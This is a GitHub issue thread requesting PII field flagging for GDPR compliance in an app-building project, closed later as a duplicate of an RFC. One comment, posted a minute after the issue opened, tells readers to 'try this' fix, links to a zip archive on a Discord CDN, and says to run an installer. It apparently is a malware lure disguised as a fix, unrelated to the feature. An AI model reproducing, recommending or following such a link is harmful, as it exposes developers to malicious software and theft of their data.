### ISSUE TITLE
[FEATURE] Add PII flagging for fields to ensure GDPR compliance

### ISSUE THREAD

**Issue by ChrisMarsh82** [IDEMSInternational/open-app-builder#2392] opened 2024-09-03 13:16 UTC
**What?**
We need a way to allow users to flag fields that contain personally identifiable information. This flag will then mark fields stored within our database. 

**Why?**
This will make sure we make it easy for our apps to be GDPR compliant. 

**Other details**
Once this is completed we will be able to create automatic processes on our servers ensuring extra security on these fields and making sure they are not stored longer than is acceptable.

**Comment by Limxxx** [comment] 2024-09-03 13:17
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by chrismclarke** [comment] 2024-11-09 17:32
I'm going to close here and move into RFC tracking issue #2516
It also might be duplicate of #2444

**Closed by chrismclarke** 2024-11-09 17:32 UTC
Labels: feature, needs discussion
